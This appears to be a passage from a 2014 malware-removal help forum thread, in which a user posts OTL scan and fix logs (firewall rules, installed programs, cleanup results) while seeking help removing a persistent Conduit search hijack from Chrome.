"{0AC8AEBA-7BA6-4B0B-8EEA-3511EE801D92}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg10\avgmfapx.exe | 
"{0E64F9D9-393A-498D-878D-172E6C37F9A9}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{11806196-10C1-4657-99B0-47BFD28B0AFA}" = protocol=6 | dir=in | app=c:\users\alan\appdata\roaming\utorrent\utorrent.exe | 
"{11BF93CC-5121-47DB-A743-754EF45E47C3}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe | 
"{1A53FE47-99DC-4221-BBF7-CC3601BB18F5}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{1B36B17F-E53E-40BB-ADD0-734D9B4062A7}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 | 
"{28B51B18-72A1-42E3-9A7B-5BD28E1A9FEF}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe | 
"{2A926A0D-8AD7-4B56-848E-D617560AB89D}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office12\groove.exe | 
"{30308EA9-6875-4BDE-8AF0-24E8FA3AC7E3}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg10\avgnsa.exe | 
"{31BFE311-F547-4036-86E5-E3A4C7762F05}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg10\avgdiagex.exe | 
"{35EC6DEB-DE08-4214-8FC5-BBF306356285}" = protocol=6 | dir=in | app=c:\windows\system32\lxdwcoms.exe | 
"{3B281A6A-E311-4ABF-A83E-C07AE61F3235}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{446A008A-0ACF-4AA2-B385-E26736C20423}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe | 
"{4853E2EB-B626-46F2-9300-3A07DA20C475}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 | 
"{4BE9A37F-A924-4735-A141-565E328452D5}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe | 
"{5692A342-9BBB-45BD-9279-A892661D3679}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{5A588F6A-8E2E-45AB-845E-317ADFEB6441}" = protocol=6 | dir=in | app=c:\program files (x86)\opera\opera.exe | 
"{5D33DA63-F658-47A8-9051-6798B791AA81}" = dir=in | app=c:\program files (x86)\cyberlink\powerdirector\pdr.exe | 
"{5F322D9C-8972-496E-A4CB-4361B5A4DB95}" = protocol=6 | dir=in | app=c:\users\alan\appdata\roaming\dropbox\bin\dropbox.exe | 
"{68B0430B-EFE3-4DF4-93C4-A53C618F189D}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{6D8569E4-7E69-4221-A03C-FC355CCA5FFC}" = protocol=17 | dir=in | app=c:\program files (x86)\opera\opera.exe | 
"{6EE11953-382D-4BF0-8FCA-7FA89D19B2B2}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg10\avgemca.exe | 
"{70D0AF06-BA22-4DC4-B979-4CE7E7A6D892}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifetray.exe | 
"{7259F815-5E4B-4ACF-A593-434151EDC481}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg10\avgnsa.exe | 
"{733F5C1B-2A40-4A25-B91F-41345E2AE38D}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe | 
"{747ABCF4-1887-41FE-821C-3E8920B32DD8}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{79B63810-7AEC-4897-8C31-52BABF4CEB6F}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg10\avgdiagex.exe | 
"{7B9E43A0-36FE-44BC-B4F4-0C085915FFA6}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg10\avgmfapx.exe | 
"{880BD4C6-D952-4F1D-88DE-00C4297C6F54}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg10\avgemca.exe | 
"{93CADEEE-9203-42D9-B48C-70754201A8A9}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 | 
"{9FF75489-9C8C-4560-8FD9-32F130A3590A}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeenc2.exe | 
"{A1115A83-3F58-4BB5-B835-46781B677C97}" = dir=in | app=c:\program files (x86)\common files\apple\apple application support\webkit2webprocess.exe | 
"{A92BA0A8-1CB1-4B87-BFB7-DC2C8B12BAAC}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 | 
"{B51F4220-FC99-44E8-B2A2-CA11B872D1C3}" = protocol=6 | dir=in | app=c:\users\alan\appdata\local\temp\~osa093.tmp\rlvknlg.exe | 
"{BA9E8C22-E43A-4DED-A5A0-7237D2C2E3BD}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe | 
"{BBE2EF81-815F-4832-A0C1-BA9D1CCF9D10}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifecam.exe | 
"{BC38FFF4-C1D2-4FF9-A3A7-B67DFEDF52EB}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{BF2B3A7A-9744-4C8F-A46F-C09259BDCB2E}" = protocol=17 | dir=in | app=c:\program files (x86)\backlinkbeast\backlinkbeast.exe | 
"{C9BFC780-1762-4F31-A316-1F24701A84D6}" = protocol=17 | dir=in | app=c:\users\alan\appdata\roaming\utorrent\utorrent.exe | 
"{CA565F3D-B961-4333-8A98-0C18109F6052}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\onenote.exe | 
"{CD4A3B97-88B2-4F6F-A3DB-381705DE0B44}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe | 
"{DDD8B34A-6987-4B22-AEE4-D215CD1370F4}" = protocol=6 | dir=in | app=c:\program files (x86)\backlinkbeast\backlinkbeast.exe | 
"{E7C2B351-2D90-412A-89BC-D52BF91AC0CC}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft lifecam\lifeexp.exe | 
"{F908FEA0-7C05-4D78-A4FB-114D871F9FD6}" = protocol=17 | dir=in | app=c:\users\alan\appdata\roaming\dropbox\bin\dropbox.exe | 
"{FB96A5B1-33C3-4635-BADB-DD03E60989A1}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office12\groove.exe | 
"TCP Query User{18F9DCE1-D2DD-47D1-AE0A-BC0BBA69557E}C:\program files (x86)\java\jre7\bin\java.exe" = protocol=6 | dir=in | app=c:\program files (x86)\java\jre7\bin\java.exe | 
"TCP Query User{6CB19EBF-9ADC-47AA-842B-FA026394B2D2}C:\program files (x86)\filezilla ftp client\filezilla.exe" = protocol=6 | dir=in | app=c:\program files (x86)\filezilla ftp client\filezilla.exe | 
"TCP Query User{CB14B550-951D-4C75-BFD5-1707B0554192}C:\program files (x86)\logmein rescue technician console\logmeinrescuetechnicianconsole_x64\lmirtechconsole.exe" = protocol=6 | dir=in | app=c:\program files (x86)\logmein rescue technician console\logmeinrescuetechnicianconsole_x64\lmirtechconsole.exe | 
"UDP Query User{27625680-604E-43B2-A475-C4B165543997}C:\program files (x86)\java\jre7\bin\java.exe" = protocol=17 | dir=in | app=c:\program files (x86)\java\jre7\bin\java.exe | 
"UDP Query User{33E7F37C-7127-493D-98E2-A290A559C0CF}C:\program files (x86)\logmein rescue technician console\logmeinrescuetechnicianconsole_x64\lmirtechconsole.exe" = protocol=17 | dir=in | app=c:\program files (x86)\logmein rescue technician console\logmeinrescuetechnicianconsole_x64\lmirtechconsole.exe | 
"UDP Query User{A9DF4872-4C7F-4FF5-AE48-FF291A58BFEF}C:\program files (x86)\filezilla ftp client\filezilla.exe" = protocol=17 | dir=in | app=c:\program files (x86)\filezilla ftp client\filezilla.exe | 
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0225AD21-F3E2-4916-BFF3-65D3F9052582}" = iTunes
"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{26A24AE4-039D-4CA4-87B4-2F86417021FF}" = Java 7 Update 21 (64-bit)
"{2F72F540-1F60-4266-9506-952B21D6640D}" = Apple Mobile Device Support
"{350AA351-21FA-3270-8B7A-835434E766AD}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{5CE7E3F5-9803-4F32-AA89-2D8848A80109}" = Microsoft LifeCam
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{8338783A-0968-3B85-AFC7-BAAE0A63DC50}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570
"{90120000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2007
"{90120000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2007
"{90120000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{9C5A08BF-BB99-4998-81BD-F6CC32483B34}" = Microsoft Corporation
"{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}" = Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{B143BE44-8723-315E-9413-011C55873C0E}" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"{B6E3757B-5E77-3915-866A-CCFC4B8D194C}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{EE936C7A-EA40-31D5-9B65-8E3E089C3828}" = Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148
"HP Photosmart Essential" = HP Photosmart Essential 3.0
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft Visual Studio 2010 Tools for Office Runtime (x64)" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"NVIDIA Drivers" = NVIDIA Drivers
"OsdMaestro" = HP On-Screen Cap/Num/Scroll Lock Indicator
"WinRAR archiver" = WinRAR 5.01 (64-bit)
"ZTE USB Driver" = ZTE USB Driver
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{08D2E121-7F6A-43EB-97FD-629B44903403}" = Microsoft_VC90_CRT_x86
"{09633A5E-3089-41A8-9FF1-382171423C5D}" = PSSWCORE
"{0E7DBD52-B097-4F2B-A7C7-F105B0D20FDB}" = LightScribe System Software  1.14.17.1
"{15B8AFD9-92E9-4E86-96D9-83FAC510B82E}" = HPPhotoSmartPhotobookWebPack1
"{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}" = Microsoft Works
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}" = CyberLink DVD Suite Deluxe
"{22F761D1-8063-4170-ADF7-2D2F47834CA9}" = VideoToolkit01
"{236BB7C4-4419-42FD-0409-1E257A25E34D}" = Adobe Photoshop CS2
"{254C37AA-6B72-4300-84F6-98A82419187E}" = Hewlett-Packard Active Check for Health Check
"{362755FC-209C-4B69-93C3-BE8101A29F8B}" = MySQL Server 5.0
"{40BF1E83-20EB-11D8-97C5-0009C5020658}" = Power2Go
"{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}" = Apple Application Support
"{55979C41-7D6A-49CC-B591-64AC1BBE2C8B}" = HP Picasso Media Center Add-In
"{5DA8F6CD-C70E-39D8-8430-3D9808D6BD17}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30411
"{5DAA9C36-8F8B-462F-8CCA-E205BC3751F5}" = HP Active Support Library
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{669D4A35-146B-4314-89F1-1AC3D7B88367}" = Hewlett-Packard Asset Agent for Health Check
"{6B976ADF-8AE8-434E-B282-A06C7F624D2F}" = Python 2.5.2
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{786C5747-1033-0000-B58E-000000000001}" = Adobe Stock Photos 1.0
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}" = Skype™ 6.14
"{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}" = Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8EDBA74D-0686-4C99-BFDD-F894678E5B39}" = Adobe Common File Installer
"{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_ENTERPRISE_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_ENTERPRISE_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_ENTERPRISE_{2314F9A1-126F-45CC-8A5E-DFAF866F3FBC}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-0020-0409-0000-0000000FF1CE}" = Compatibility Pack for the 2007 Office system
"{90120000-002A-0000-1000-0000000FF1CE}_ENTERPRISE_{664655D8-B9BB-455D-8A58-7EAF7B0B2862}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-002A-0409-1000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
"{90120000-0030-0000-0000-0000000FF1CE}" = Microsoft Office Enterprise 2007
"{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2007
"{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2007
"{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2007
"{90120000-00BA-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0114-0409-0000-0000000FF1CE}" = Microsoft Office Groove Setup Metadata MUI (English) 2007
"{90120000-0114-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0116-0409-1000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{92D58719-BBC1-4CC3-A08B-56C9E884CC2C}" = Microsoft_VC80_CRT_x86
"{95120000-00AF-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint Viewer 2007 (English)
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9DBA770F-BF73-4D39-B1DF-6035D95268FC}" = HP Customer Feedback
"{A0640EC2-B97E-4FC1-AD14-227C9E386BB4}" = HP Recovery Manager RSS
"{A2016015-8323-4AF8-8B3E-F56239D7D59D}" = HP Demo
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}" = QuickTime
"{AF37176A-78CA-545B-34EF-8B6A21514DD1}" = Adobe Help Manager
"{B3BC9DB1-0B0A-48B0-B86B-EA77CAA7F800}" = Microsoft Corporation
"{B74D4E10-1033-0000-0000-000000000001}" = Adobe Bridge 1.0
"{C27C82E4-9C53-4D76-9ED3-A01A3D5EE679}" = HP Customer Experience Enhancements
"{C59C179C-668D-49A9-B6EA-0121CCFC1243}" = LabelPrint
"{C779648B-410E-4BBA-B75B-5815BCEFE71D}" = Safari
"{C8FD5BC1-92EF-4C15-92A9-F9AC7F61985F}" = HP Update
"{CB099890-1D5F-11D5-9EA9-0050BAE317E1}" = PowerDirector
"{D74CFE48-087F-46E1-80E6-E2950E1A8DCE}" = HP Photosmart Essential 2.5
"{DDFB9315-8964-B381-2167-0C0FE726CD99}" = Tracker
"{E535C94A-B87F-4182-BEA8-1E9322078D3E}" = Cards_Calendar_OrderGift_DoMorePlugout
"{E9787678-1033-0000-8E67-000000000001}" = Adobe Help Center 1.0
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{f32502b5-5b64-4882-bf61-77f23edcac4f}" = HP Total Care Advisor
"{F405DC00-37F3-4A5F-97F4-C1310CCEE53A}" = HP Easy Setup - Frontend
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"Adobe Flash Player ActiveX" = Adobe Flash Player ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 12 Plugin
"Adobe Photoshop CS2 - {236BB7C4-4419-42FD-0409-1E257A25E34D}" = Adobe Photoshop CS2
"Adobe Shockwave Player" = Adobe Shockwave Player 12.0
"Audacity_is1" = Audacity 2.0.5
"chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1" = Adobe Help Manager
"com.elance.tracker" = Tracker
"ENTERPRISE" = Microsoft Office Enterprise 2007
"FileZilla Client" = FileZilla Client 3.7.0.2
"Google Chrome" = Google Chrome
"InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}" = PowerDirector
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.75.0.1300
"Mozilla Firefox 27.0.1 (x86 en-US)" = Mozilla Firefox 27.0.1 (x86 en-US)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Notepad++" = Notepad++
"Opera 12.14.1738" = Opera 12.14
"PC-Doctor for Windows" = Hardware Diagnostic Tools
"Revo Uninstaller" = Revo Uninstaller 1.95
"winscp3_is1" = WinSCP 5.1.4
 
========== HKEY_USERS Uninstall List ==========
 
[HKEY_USERS\S-1-5-21-465606687-3642172284-1488456202-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 25/03/2014 13:45:24 | Computer Name = Alan-PC | Source = WinMgmt | ID = 10
Description = 
 
[ System Events ]
Error - 25/03/2014 13:45:25 | Computer Name = Alan-PC | Source = Service Control Manager | ID = 7000
Description = 
 
Error - 25/03/2014 13:45:25 | Computer Name = Alan-PC | Source = Service Control Manager | ID = 7000
Description = 
 
Error - 25/03/2014 13:45:25 | Computer Name = Alan-PC | Source = Service Control Manager | ID = 7026
Description = 
 
 
< End of report >

OK, here's the log. But even though it says it's removed them, the minute I start up Chrome again it goes straight back to Conduit search and the extension is still installed.

 

All processes killed
========== OTL ==========
Prefs.js: S", "" removed from browser.search.defaultenginename,S
Prefs.js: "" removed from browser.search.order.1
Prefs.js: S", "" removed from browser.search.order.1,S
Prefs.js: S", "" removed from browser.search.selectedEngine,S
C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\extensions\tafo@oescgz.org\content folder moved successfully.
C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\extensions\tafo@oescgz.org folder moved successfully.
C:\Users\Alan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mggdnalmmmoogbjpihpbafcjfmoppdkk\2.4_0 folder moved successfully.
C:\Users\Alan\AppData\Roaming\uTorrent folder moved successfully.
========== FILES ==========
< ipconfig /flushdns /c >
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
C:\Users\Alan\Desktop\cmd.bat deleted successfully.
C:\Users\Alan\Desktop\cmd.txt deleted successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: Alan
->Temp folder emptied: 3693885 bytes
->Temporary Internet Files folder emptied: 87387167 bytes
->Java cache emptied: 7098229 bytes
->FireFox cache emptied: 58714732 bytes
->Google Chrome cache emptied: 463384655 bytes
->Apple Safari cache emptied: 38018048 bytes
->Opera cache emptied: 12761350 bytes
->Flash cache emptied: 3045 bytes
 
User: All Users
 
User: AppData
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 33170 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1446602748 bytes
%systemroot%\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 59585 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 35782730 bytes
RecycleBin emptied: 69681296 bytes
 
Total Files Cleaned = 2,120.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 03282014_164854
 
Files\Folders moved on Reboot...
File\Folder C:\Windows\temp\ib62 not found!
File\Folder C:\Windows\temp\ib63 not found!
File\Folder C:\Windows\temp\ib64 not found!
File\Folder C:\Windows\temp\ib65 not found!
File\Folder C:\Windows\temp\ib66 not found!
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...

Thanks for all your help. Here's the log:

 

OTL logfile created on: 28/03/2014 18:50:22 - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Alan\Desktop
64bit-Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
 
3.87 Gb Total Physical Memory | 2.30 Gb Available Physical Memory | 59.41% Memory free
7.96 Gb Paging File | 6.06 Gb Available in Paging File | 76.11% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 451.62 Gb Total Space | 250.02 Gb Free Space | 55.36% Space Free | Partition Type: NTFS
Drive D: | 14.14 Gb Total Space | 1.92 Gb Free Space | 13.55% Space Free | Partition Type: NTFS
 
Computer Name: ALAN-PC | User Name: Alan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - File not found -- 
PRC - [2014/03/28 16:05:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
PRC - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2013/04/04 14:50:32 | 000,532,040 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
PRC - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
PRC - [2007/04/18 15:01:34 | 000,065,536 | ---- | M] (Hewlett-Packard Company) -- C:\hp\support\hpsysdrv.exe
PRC - [2006/05/26 03:50:24 | 004,149,248 | ---- | M] () -- C:\Program Files (x86)\MySQL\MySQL Server 5.0\bin\mysqld-nt.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/02/13 04:04:54 | 000,998,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\c5213af29d521ee19cc55983f8c2037c\System.Management.ni.dll
MOD - [2014/02/13 04:03:05 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\e3ab5ab0fbb86c36425e6902e54a547b\System.Runtime.Remoting.ni.dll
MOD - [2014/02/13 04:03:02 | 000,627,200 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\24c666e940e61baf4d33315346a03ab6\System.Transactions.ni.dll
MOD - [2014/02/13 04:03:01 | 000,627,712 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\cbadc7af4484ceeb8092c5f2b1240f0b\System.EnterpriseServices.ni.dll
MOD - [2014/02/13 04:03:01 | 000,280,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\cbadc7af4484ceeb8092c5f2b1240f0b\System.EnterpriseServices.Wrapper.dll
